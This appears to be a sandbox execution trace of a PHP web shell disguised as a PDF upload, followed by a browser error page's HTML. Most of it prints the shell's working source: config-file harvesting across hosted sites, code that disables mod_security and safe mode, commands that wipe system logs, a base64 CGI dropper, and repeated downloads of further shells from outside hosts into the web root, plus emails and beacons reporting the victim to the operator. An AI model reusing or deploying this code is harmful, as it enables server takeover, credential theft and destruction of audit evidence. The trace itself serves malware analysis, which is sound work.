$c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = 
$burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == 
true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." 
|<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf 
/var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = 
\'[base64-encoded payload removed]\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . 
$_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code	1	0
4	13	0	0.008003	1143856	base64_decode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.008024	1143944
4	13	R			'http://byr00t.co/l-'
4	14	0	0.008041	1143912	GetIP	1		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.008056	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008072	1143944
5	15	R			FALSE
5	16	0	0.008087	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008102	1143944
5	16	R			FALSE
5	17	0	0.008115	1143912	getenv	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008131	1143984
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008161	1143952
4	14	R			'127.0.0.1'
4	18	0	0.008176	1143976	base64_encode	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php.PDF'
4	18	1	0.008193	1144104
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	19	0	0.008227	1143968	function_exists	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008243	1144008
4	19	R			TRUE
4	20	0	0.008257	1143968	curl_init	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008289	1144880
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008318	1144880	curl_setopt	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	21	1	0.008339	1144976
4	21	R			TRUE
4	22	0	0.008353	1144880	curl_setopt	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008412	1144976
4	22	R			TRUE
4	23	0	0.008427	1144880	curl_exec	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.051570	1144912
4	23	R			''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.051644	1144880	curl_close	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.051722	1144024
4	24	R			NULL
4	25	0	0.051741	1143992	file_get_contents	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg=='
4	25	1	0.671137	1147704
4	25	R			''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.671304	1147664	define	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.671335	1147768
4	26	R			TRUE
4	27	0	0.671367	1147696	strpos	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.671384	1147768
4	27	R			FALSE
4	28	0	0.671422	1147696	session_start	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.671507	1148448
4	28	R			TRUE
4	29	0	0.671523	1148448	error_reporting	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.671538	1148488
4	29	R			0
4	30	0	0.671552	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.671568	1148520
4	30	R			''
4	31	0	0.671581	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.671596	1148520
4	31	R			''
4	32	0	0.671610	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.671624	1148520
4	32	R			'1'
4	33	0	0.671637	1148448	ini_set	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.671654	1148552
4	33	R			'30'
4	34	0	0.671667	1148448	set_time_limit	0		/var/www/html/uploads/wso1.php.PDF(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.671682	1148512
4	34	R			FALSE
3	12	1	0.671706	1149960
2	7	1	0.671724	1062936
1	3	1	0.671732	1061360
1	35	0	0.671739	1061392	Error->__toString	0		Unknown	0	0
2	36	0	0.671752	1061472	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.671765	1061728
2	36	R			'#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
1	35	1	0.671785	1065864
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.PDF(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.PDF(4): eval()\n#2 {main}'
			0.671840	986352
TRACE END   [2023-02-13 00:45:05.844329]


Generated HTML code

<html dir="ltr" lang="en"><head>
  <meta charset="utf-8">
  <meta name="color-scheme" content="light dark">
  <meta name="theme-color" content="#fff">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,
                                 maximum-scale=1.0, user-scalable=no">
  <title>localhost</title>
  <style>/* Copyright 2017 The Chromium Authors
 * Use of this source code is governed by a BSD-style license that can be
 * found in the LICENSE file. */

a {
  color: var(--link-color);
}

body {
  --background-color: #fff;
  --error-code-color: var(--google-gray-700);
  --google-blue-100: rgb(210, 227, 252);
  --google-blue-300: rgb(138, 180, 248);
  --google-blue-600: rgb(26, 115, 232);
  --google-blue-700: rgb(25, 103, 210);
  --google-gray-100: rgb(241, 243, 244);
  --google-gray-300: rgb(218, 220, 224);
  --google-gray-500: rgb(154, 160, 166);
  --google-gray-50: rgb(248, 249, 250);
  --google-gray-600: rgb(128, 134, 139);
  --google-gray-700: rgb(95, 99, 104);
  --google-gray-800: rgb(60, 64, 67);
  --google-gray-900: rgb(32, 33, 36);
  --heading-color: var(--google-gray-900);
  --link-color: rgb(88, 88, 88);
  --popup-container-background-color: rgba(0,0,0,.65);
  --primary-button-fill-color-active: var(--google-blue-700);
  --primary-button-fill-color: var(--google-blue-600);
  --primary-button-text-color: #fff;
  --quiet-background-color: rgb(247, 247, 247);
  --secondary-button-border-color: var(--google-gray-500);
  --secondary-button-fill-color: #fff;
  --secondary-button-hover-border-color: var(--google-gray-600);
  --secondary-button-hover-fill-color: var(--google-gray-50);
  --secondary-button-text-color: var(--google-gray-700);
  --small-link-color: var(--google-gray-700);
  --text-color: var(--google-gray-700);
  background: var(--background-color);
  color: var(--text-color);
  word-wrap: break-word;
}

.nav-wrapper .secondary-button {
  background: var(--secondary-button-fill-color);
  border: 1px solid var(--secondary-button-border-color);
  color: var(--secondary-button-text-color);
  float: none;
  margin: 0;
  padding: 8px 16px;
}

.hidden {
  display: none;
}

html {
  -webkit-text-size-adjust: 100%;
  font-size: 125%;
}

.icon {
  background-repeat: no-repeat;
  background-size: 100%;
}

@media (prefers-color-scheme: dark) {
  body {
    --background-color: var(--google-gray-900);
    --error-code-color: var(--google-gray-500);
    --heading-color: var(--google-gray-500);
    --link-color: var(--google-blue-300);
    --primary-button-fill-color-active: rgb(129, 162, 208);
    --primary-button-fill-color: var(--google-blue-300);
    --primary-button-text-color: var(--google-gray-900);
    --quiet-background-color: var(--background-color);
    --secondary-button-border-color: var(--google-gray-700);
    --secondary-button-fill-color: var(--google-gray-900);
    --secondary-button-hover-fill-color: rgb(48, 51, 57);
    --secondary-button-text-color: var(--google-blue-300);
    --small-link-color: var(--google-blue-300);
    --text-color: var(--google-gray-500);
  }
}
</style>
  <style>/* Copyright 2014 The Chromium Authors
   Use of this source code is governed by a BSD-style license that can be
   found in the LICENSE file. */

button {
  border: 0;
  border-radius: 4px;
  box-sizing: border-box;
  color: var(--primary-button-text-color);
  cursor: pointer;
  float: right;
  font-size: .875em;
  margin: 0;
  padding: 8px 16px;
  transition: box-shadow 150ms cubic-bezier(0.4, 0, 0.2, 1);
  user-select: none;
}

[dir='rtl'] button {
  float: left;
}

.bad-clock button,
.captive-portal button,
.https-only button,
.insecure-form button,
.lookalike-url button,
.main-frame-blocked button,
.neterror button,
.pdf button,
.ssl button,
.enterprise-block button,
.enterprise-warn button,
.safe-browsing-billing button {
  background: var(--primary-button-fill-color);
}

button:active {
  background: var(--primary-button-fill-color-active);
  outline: 0;
}

#debugging {
  display: inline;
  overflow: auto;
